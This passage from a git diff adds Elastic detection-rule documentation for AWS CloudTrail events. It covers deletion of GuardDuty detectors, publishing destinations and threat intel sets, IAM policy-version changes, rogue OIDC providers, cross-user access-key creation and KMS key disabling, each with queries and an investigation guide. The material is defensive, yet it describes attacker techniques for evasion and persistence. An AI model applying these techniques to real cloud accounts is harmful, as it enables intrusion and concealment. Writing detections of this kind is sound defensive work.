GuardDuty alerts and findings (if still retrievable) to determine whether the deletion followed significant detection activity. + - Use centralized logs or security data lakes to recover findings removed from the console. + + +*False positive analysis* + + +- **Authorized administrative actions** + - Verify whether the deletion corresponds to legitimate account decommissioning, region cleanup, or migration activity. +- **Automation or IaC** + - GuardDuty may be disabled temporarily during infrastructure provisioning or teardown in automated environments. + Confirm via CI/CD logs or Infrastructure-as-Code templates. +- **Organizational configuration changes** + - Large organizations might consolidate GuardDuty under a delegated administrator account, causing detectors to be deleted in member accounts. + Validate these actions against security architecture changes. + + +*Response and remediation* + + +- **Containment and restoration** + - If unauthorized, immediately re-enable GuardDuty in the affected account and region using the `CreateDetector` API or AWS console. + - Verify that findings aggregation and member account associations are restored to expected configurations. + +- **Investigation** + - Review CloudTrail for related privilege escalation or resource tampering events around the deletion time. + - Assess whether any attacker activity occurred during the monitoring gap between deletion and restoration. + +- **Recovery and hardening** + - Restrict `guardduty:DeleteDetector` permissions to a limited administrative role. + - Implement AWS Config rules or Security Hub controls to alert on changes to GuardDuty detectors or configuration states. + - Enforce least privilege IAM policies, ensuring operational automation cannot disable GuardDuty outside maintenance workflows. + - Document approved GuardDuty maintenance activities and correlate them with change tickets for traceability. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: aws.cloudtrail + and event.provider: guardduty.amazonaws.com + and event.action: DeleteDetector + and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-publishing-destination-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-publishing-destination-deleted.asciidoc new file mode 100644 index 0000000000..8549f6ecc1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-publishing-destination-deleted.asciidoc @@ -0,0 +1,111 @@ +[[prebuilt-rule-8-19-32-aws-guardduty-publishing-destination-deleted]] +=== AWS GuardDuty Publishing Destination Deleted + +Detects the deletion of an Amazon GuardDuty publishing destination. Publishing destinations export GuardDuty findings to S3, Security Lake, or EventBridge for long-term retention and SIEM ingestion. An adversary with GuardDuty administrative access may delete a publishing destination to prevent findings from reaching external storage or a security operations center, reducing the visibility of their activity while leaving the GuardDuty detector active. + +*Rule type*: query + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeletePublishingDestination.html +* https://hackingthe.cloud/aws/avoiding-detection/modify-guardduty-config/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS GuardDuty +* Rule Type: Custom Query (KQL) +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS GuardDuty Publishing Destination Deleted* + + +Amazon GuardDuty publishing destinations export threat findings to S3 buckets, Amazon Security Lake, or EventBridge buses for retention and downstream SIEM ingestion. Deleting a publishing destination severs this pipeline: findings still appear in the GuardDuty console but are no longer exported, making it harder for security operations to correlate GuardDuty alerts with other event sources. + +This action is uncommon in production environments. Legitimate deletions occur during planned migrations to a new destination or when decommissioning GuardDuty in an account. + + +*Possible investigation steps* + + +- Identify the caller from `aws.cloudtrail.user_identity.arn` and `user.name`. Verify this identity has a documented reason to modify GuardDuty configuration. +- Check `aws.cloudtrail.request_parameters` for the destination ID and detector ID. Query GuardDuty to confirm whether any publishing destination remains configured. +- Review CloudTrail for other GuardDuty control-plane actions by the same identity in the surrounding time window: `DeleteDetector`, `UpdateDetector`, `CreateFilter`, `CreateIPSet`. +- Determine whether a replacement destination was configured before or after the deletion. +- Correlate with IAM changes that may have granted GuardDuty administrative access to the calling identity. + + +*Response and remediation* + + +- If unauthorized, immediately re-create the publishing destination to restore findings export. +- Rotate credentials for the calling identity and review all actions taken by those credentials. +- Apply an SCP or IAM policy restricting `guardduty:DeletePublishingDestination` to a dedicated security operations role. +- Review GuardDuty member account configurations to confirm the action was not replicated across multiple accounts. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. GuardDuty management events are logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "guardduty.amazonaws.com" + and event.action: "DeletePublishingDestination" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-threat-intelligence-set-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-threat-intelligence-set-deleted.asciidoc new file mode 100644 index 0000000000..00b45db68b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-threat-intelligence-set-deleted.asciidoc @@ -0,0 +1,110 @@ +[[prebuilt-rule-8-19-32-aws-guardduty-threat-intelligence-set-deleted]] +=== AWS GuardDuty Threat Intelligence Set Deleted + +Detects the deletion of an Amazon GuardDuty threat intelligence set. Threat intelligence sets are custom lists of known-malicious IP addresses or domains that GuardDuty uses to generate findings when monitored resources communicate with those indicators. Deleting a threat intel set degrades GuardDuty's detection capability for known adversary infrastructure, allowing communication with threat-actor-controlled IP ranges to go undetected. + +*Rule type*: query + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteThreatIntelSet.html +* https://hackingthe.cloud/aws/avoiding-detection/modify-guardduty-config/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS GuardDuty +* Rule Type: Custom Query (KQL) +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS GuardDuty Threat Intelligence Set Deleted* + + +GuardDuty threat intelligence sets allow security teams to upload custom lists of known-malicious IP addresses and domains. GuardDuty generates high-priority findings when monitored resources contact addresses in these sets. Deleting a threat intel set reduces GuardDuty's ability to detect communication with known adversary infrastructure. + +Legitimate deletions occur during feed rotation (replacing an old set with an updated version) or when decommissioning a threat intel feed. Both operations should be planned and documented. + + +*Possible investigation steps* + + +- Identify the caller from `aws.cloudtrail.user_identity.arn` and `user.name`. +- Check `aws.cloudtrail.request_parameters` for the threat intel set ID and detector ID. Determine whether any threat intel sets remain active in the detector. +- Review CloudTrail for adjacent GuardDuty control-plane modifications: `CreateThreatIntelSet`, `UpdateThreatIntelSet`, `CreateIPSet`, `UpdateIPSet`, `DeleteDetector`, `CreateFilter`. +- Determine whether a replacement threat intel set was created before or after the deletion. +- Correlate with other defense-evasion indicators such as GuardDuty detector updates or suppression rule creation. + + +*Response and remediation* + + +- Re-create or restore the threat intelligence set if the deletion was unauthorized. +- Rotate credentials for the calling identity and review all actions taken by those credentials. +- Apply an SCP or IAM policy restricting `guardduty:DeleteThreatIntelSet` to a dedicated security operations role. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. GuardDuty management events are logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "guardduty.amazonaws.com" + and event.action: "DeleteThreatIntelSet" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-customer-managed-policy-version-created-or-default-version-set.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-customer-managed-policy-version-created-or-default-version-set.asciidoc new file mode 100644 index 0000000000..718fa89111 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-customer-managed-policy-version-created-or-default-version-set.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-32-aws-iam-customer-managed-policy-version-created-or-default-version-set]] +=== AWS IAM Customer Managed Policy Version Created or Default Version Set + +Identifies successful IAM API calls that create a new customer managed policy version or set the default version for an existing customer managed policy. Attackers with `iam:CreatePolicyVersion` or `iam:SetDefaultPolicyVersion` on a privileged policy can introduce a permissive policy document and activate it, escalating effective permissions without attaching a new policy. These APIs are high impact when the target policy is attached to powerful roles or users. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreatePolicyVersion.html +* https://docs.aws.amazon.com/IAM/latest/APIReference/API_SetDefaultPolicyVersion.html +* https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS IAM +* Tactic: Privilege Escalation +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS IAM Customer Managed Policy Version Created or Default Version Set* + + +`CreatePolicyVersion` uploads a new immutable version of a customer managed policy. `SetDefaultPolicyVersion` switches +which version principals evaluate—immediately changing effective access if the policy is already attached. + + +*Possible investigation steps* + + +- From `aws.cloudtrail.request_parameters`, extract `policyArn`, `policyDocument` (if present), and `setAsDefault`. +- Map the policy ARN to attached users, groups, and roles; prioritize policies attached to admin or break-glass roles. +- Compare the new or selected version to prior versions in IAM or version history for added `Action`/`Resource` wildcards. +- Review `aws.cloudtrail.user_identity.arn`, `source.ip`, and `user_agent.original` for interactive vs automation context. +- Correlate with `AttachUserPolicy`, `AttachRolePolicy`, or `CreatePolicyVersion` spikes from the same principal. + + +*False positive analysis* + + +- Planned policy releases and rollbacks are expected in mature shops; baseline known publishers. + + +*Response and remediation* + + +- If malicious: set default to a known-good version, delete bad versions where supported, detach policy if necessary, and + revoke excess `iam:*` on the actor. + + +*Additional information* + + +- https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreatePolicyVersion.html[CreatePolicyVersion] +- https://docs.aws.amazon.com/IAM/latest/APIReference/API_SetDefaultPolicyVersion.html[SetDefaultPolicyVersion] + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "aws.cloudtrail" + and event.provider: "iam.amazonaws.com" + and event.action: ("CreatePolicyVersion" or "SetDefaultPolicyVersion") + and event.outcome: "success" + and not aws.cloudtrail.user_identity.type: "AWSService" + and not aws.cloudtrail.user_identity.arn:arn*/terraform + and not source.as.organization.name:(Amazon* or AMAZON* or "Google LLC" or "MongoDB, Inc.") + and not source.address: ( "cloudformation.amazonaws.com" or "servicecatalog.amazonaws.com") + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Temporary Elevated Cloud Access +** ID: T1548.005 +** Reference URL: https://attack.mitre.org/techniques/T1548/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-oidc-provider-created-by-rare-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-oidc-provider-created-by-rare-user.asciidoc new file mode 100644 index 0000000000..fee9e4611a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-oidc-provider-created-by-rare-user.asciidoc @@ -0,0 +1,178 @@ +[[prebuilt-rule-8-19-32-aws-iam-oidc-provider-created-by-rare-user]] +=== AWS IAM OIDC Provider Created by Rare User + +Detects when an uncommon user or role creates an OpenID Connect (OIDC) Identity Provider in AWS IAM. OIDC providers enable web identity federation, allowing users authenticated by external identity providers (such as Google, GitHub, or custom OIDC-compliant providers) to assume IAM roles and access AWS resources. Adversaries who have gained administrative access may create rogue OIDC providers to establish persistent, federated access that survives credential rotation. This technique allows attackers to assume roles using tokens from an IdP they control. While OIDC provider creation is benign in some environments, it should still be validated against authorized infrastructure changes. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateOpenIDConnectProvider.html +* https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_oidc.html +* https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS IAM +* Tactic: Persistence +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS IAM OIDC Provider Created by Rare User* + + +OpenID Connect (OIDC) providers in AWS IAM enable web identity federation, allowing external identity providers to authenticate users who then assume IAM roles. Common legitimate use cases include GitHub Actions accessing AWS resources, Kubernetes pods authenticating to AWS, and web applications using social login. + +This rule detects the first time a specific user or role creates an OIDC provider within an account. While OIDC provider creation is common in some environments, a new user creating one for the first time warrants validation to ensure it's authorized. + + +*Possible investigation steps* + + +- **Identify the actor** + - Review `aws.cloudtrail.user_identity.arn` to determine who created the OIDC provider. + - Check if this user has created OIDC providers before in other accounts. + +- **Review the OIDC provider details** + - Examine `aws.cloudtrail.request_parameters` for the provider URL and client IDs. + - Identify the external IdP (e.g., GitHub, Google, custom provider). + +- **Validate business justification** + - Confirm with DevOps or platform teams whether this aligns with CI/CD pipeline setup. + - Check for related change tickets or infrastructure-as-code deployments. + +- **Check for follow-on activity** + - Search for `CreateRole` or `UpdateAssumeRolePolicy` calls that trust the new OIDC provider. + - Look for `AssumeRoleWithWebIdentity` calls using the newly created provider. + +- **Correlate with other suspicious activity** + - Check for preceding privilege escalation or credential access events. + - Look for other persistence mechanisms being established concurrently. + + +*False positive analysis* + + +- **CI/CD pipeline integration** + - GitHub Actions, GitLab CI, and other CI/CD systems commonly use OIDC for AWS authentication. + - Validate against known DevOps workflows. + +- **Kubernetes federation** + - EKS and self-managed Kubernetes clusters may use OIDC providers for pod identity. + - Confirm with platform engineering teams. + +- **Infrastructure-as-code deployments** + - Terraform, CloudFormation, or other IaC tools may create OIDC providers. + - Verify via CI/CD logs. + + +*Response and remediation* + + +- **Immediate containment** + - If unauthorized, delete the OIDC provider using `DeleteOpenIDConnectProvider`. + - Review and remove any IAM roles that trust the rogue provider. + +- **Investigation** + - Audit CloudTrail for any `AssumeRoleWithWebIdentity` calls using this provider. + - Review all IAM roles with web identity trust relationships. + +- **Hardening** + - Restrict `iam:CreateOpenIDConnectProvider` permissions to authorized roles. + - Implement SCPs to control OIDC provider creation in member accounts. + - Enable AWS Config rules to monitor identity provider configurations. + + +*Additional information* + +- **https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_oidc.html[AWS IAM OIDC Providers Documentation]** +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "iam.amazonaws.com" + and event.action: "CreateOpenIDConnectProvider" + and event.outcome: "success" + and not user_agent.original: (*Terraform* or *eksctl*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Domain or Tenant Policy Modification +** ID: T1484 +** Reference URL: https://attack.mitre.org/techniques/T1484/ +* Sub-technique: +** Name: Trust Modification +** ID: T1484.002 +** Reference URL: https://attack.mitre.org/techniques/T1484/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Domain or Tenant Policy Modification +** ID: T1484 +** Reference URL: https://attack.mitre.org/techniques/T1484/ +* Sub-technique: +** Name: Trust Modification +** ID: T1484.002 +** Reference URL: https://attack.mitre.org/techniques/T1484/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-user-created-access-keys-for-another-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-user-created-access-keys-for-another-user.asciidoc new file mode 100644 index 0000000000..e2325de797 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-user-created-access-keys-for-another-user.asciidoc @@ -0,0 +1,208 @@ +[[prebuilt-rule-8-19-32-aws-iam-user-created-access-keys-for-another-user]] +=== AWS IAM User Created Access Keys For Another User + +An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by creating a new set of credentials for an existing user. This rule looks for use of the IAM `CreateAccessKey` API operation to create new programmatic access keys for another IAM user. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/#iamcreateaccesskey +* https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence +* https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud +* https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS IAM +* Tactic: Persistence +* Tactic: Privilege Escalation +* Rule Type: ESQL +* Resources: Investigation Guide + +*Version*: 15 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS IAM User Created Access Keys For Another User* + + +AWS IAM access keys are long-term credentials that grant programmatic access to AWS resources. The `iam:CreateAccessKey` permission allows an IAM principal to generate new access keys for an existing IAM user. +While this operation can be legitimate (for example, credential rotation), it can also be abused to establish persistence or privilege escalation if one user creates keys for another account without authorization. + +This rule identifies `CreateAccessKey` API calls where the calling user (`aws.cloudtrail.user_identity.arn`) differs from the target user (`aws.cloudtrail.request_parameters.userName`), indicating one IAM identity creating credentials for another. + + +*Possible investigation steps* + + +- **Confirm both user identities and intent.** + Identify the calling user (who performed `CreateAccessKey`) and the target user (whose access key was created). Contact both account owners or application teams to confirm if this operation was expected. + +- **Review CloudTrail event details.** + Check the following fields directly in the alert or corresponding CloudTrail record: + - `source.ip` — does it align with expected corporate ranges or known admin automation? + - `user_agent.original` — AWS Console, CLI, SDK, or custom client? Unexpected user agents (for example, non-SDK scripts) may indicate manual or unauthorized use. + - `source.geo` fields — verify the location details are expected for the identity. + +- **Correlate with related IAM activity.** + In CloudTrail, search for subsequent or nearby events such as: + - `AttachUserPolicy`, `AttachGroupPolicy`, `UpdateAssumeRolePolicy`, or `CreateUser`. + These can indicate privilege escalation or lateral movement. + Also review whether the same principal recently performed `CreateAccessKey` for multiple users or repeated this action across accounts. + +- **Inspect the new access key’s usage.** + Search for the newly created key ID (`aws.cloudtrail.response_elements.accessKey.accessKeyId`) in CloudTrail events following creation. Determine if it was used from unusual IP addresses, geographies, or services. + +- **Assess the risk of credential compromise.** + If you suspect malicious behavior, consider the following indicators: + - A non-admin user invoking `CreateAccessKey` for another user. + - Creation outside of normal automation pipelines. + - Use of the new key from a different IP or AWS account soon after creation. + +- **Scope related activity.** + Review all activity from the calling user in the past 24–48 hours, focusing on `iam:*` API calls and resource creation events. + Correlate any S3, EC2, or KMS access attempts made using the new key to identify potential impact or data exposure. + + +*False positive analysis* + + +- **Expected credential rotation.** + Some environments delegate credential rotation responsibilities to centralized automation or specific admin roles. Confirm if the calling user is authorized for such actions. +- **Administrative workflows.** + Account provisioning systems may legitimately create keys on behalf of users. Check for standard tags, automation tools, or user agents that indicate managed operations. +- **Service-linked roles or external IAM automation.** + Some AWS services create or rotate credentials automatically. Validate if the caller is a service-linked role or an automation IAM role used by a known deployment process. + + +*Response and remediation* + + +**Immediate containment** +- Deactivate or delete the access key from the target IAM user immediately using the AWS Console, CLI, or API (`DeleteAccessKey`). +- Rotate or reset credentials for both the calling and target users to eliminate possible compromise. +- Restrict risky principals. Temporarily deny `iam:CreateAccessKey` and `iam:UpdateAccessKey` permissions for non-administrative roles while scoping the incident. +- Enable or confirm MFA on both accounts involved, if not already enforced. + +**Evidence preservation** +- Export all related `CreateAccessKey`, `DeleteAccessKey`, and `UpdateAccessKey` events within ±30 minutes of the alert to an evidence bucket. +- Preserve CloudTrail, GuardDuty, and AWS Config data for the same period. +- Record key event details: caller ARN, target user, `accessKeyId`, `source.ip`, `userAgent`, and timestamps. + +**Scoping and investigation** +- Search CloudTrail for usage of the new access key ID after creation. Identify any API activity or data access tied to it. +- Review IAM policy changes, group modifications, or new role assumptions around the same time. +- Determine if any additional credentials or trust policy changes were made by the same actor. +- Check for GuardDuty findings referencing anomalous credential usage or suspicious API behavior. + +**Recovery and hardening** +- Remove or disable any unauthorized keys and re-enable only verified credentials. +- Implement least-privilege IAM policies to limit which users can perform `CreateAccessKey`. +- Monitor for future `CreateAccessKey` events where `userIdentity.arn != request_parameters.userName`. +- Ensure Cloudtrail, GuardDuty and Security Hub are active across all regions. +- Educate administrative users on secure key rotation processes and the risk of cross-user key creation. + + +*Additional information* + + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]:** Reference “Credential Compromise” and “IAM Misuse” procedures for containment and recovery. +- **https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]:** See “Identity Access Review” and “Unauthorized Access Key Creation” for example response flows. +- **AWS Documentation:** https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html[Best practices for managing access keys]. +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-aws.cloudtrail-* metadata _id, _version, _index +| where data_stream.dataset == "aws.cloudtrail" + and event.provider == "iam.amazonaws.com" + and event.action == "CreateAccessKey" + and event.outcome == "success" + and user.name != user.target.name + and not to_lower(user_agent.original) like "*terraform*" + and not to_lower(user_agent.original) like "*pulumi*" + and not to_lower(user_agent.original) like "*ansible*" +| keep + @timestamp, + cloud.account.id, + cloud.region, + event.provider, + event.action, + event.outcome, + data_stream.dataset, + user.name, + source.address, + source.ip, + user.target.name, + user_agent.original, + aws.cloudtrail.request_parameters, + aws.cloudtrail.response_elements, + aws.cloudtrail.user_identity.arn, + aws.cloudtrail.user_identity.type, + aws.cloudtrail.user_identity.access_key_id, + source.geo.*, + _id, + _version, + _index + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc new file mode 100644 index 0000000000..65d59cb0b9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc @@ -0,0 +1,180 @@ +[[prebuilt-rule-8-19-32-aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion]] +=== AWS KMS Customer Managed Key Disabled or Scheduled for Deletion + +Identifies attempts to disable or schedule the deletion of an AWS customer managed KMS Key. Disabling or scheduling a KMS key for deletion removes the ability to decrypt data encrypted under that key and can permanently destroy access to critical resources. Adversaries may use these operations to cause irreversible data loss, disrupt business operations, impede incident response, or hide evidence of prior activity. Because KMS keys often protect sensitive or regulated data, any modification to their lifecycle should be considered highly sensitive and investigated promptly. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/cli/latest/reference/kms/disable-key.html +* https://docs.aws.amazon.com/cli/latest/reference/kms/schedule-key-deletion.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS KMS +* Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 114 + +*Rule authors*: + +* Xavier Pich + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS KMS Customer Managed Key Disabled or Scheduled for Deletion* + + +AWS KMS keys underpin encryption for S3, EBS, RDS, Secrets Manager, Lambda, and numerous other AWS services. Disabling a KMS key or scheduling its deletion immediately disrupts encryption and decryption workflows, and, once deleted, renders all data encrypted with that key unrecoverable. + +Because these operations are rare, highly privileged, and tightly controlled in mature environments, they should be treated as high-risk, destructive actions when performed unexpectedly. Adversaries may disable or delete KMS keys to sabotage recovery, impede forensic analysis, or destroy evidence after exfiltration. + + + +*Possible investigation steps* + + +- **Identify the actor and authentication context** + - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine the caller. + - Check `source.ip`, 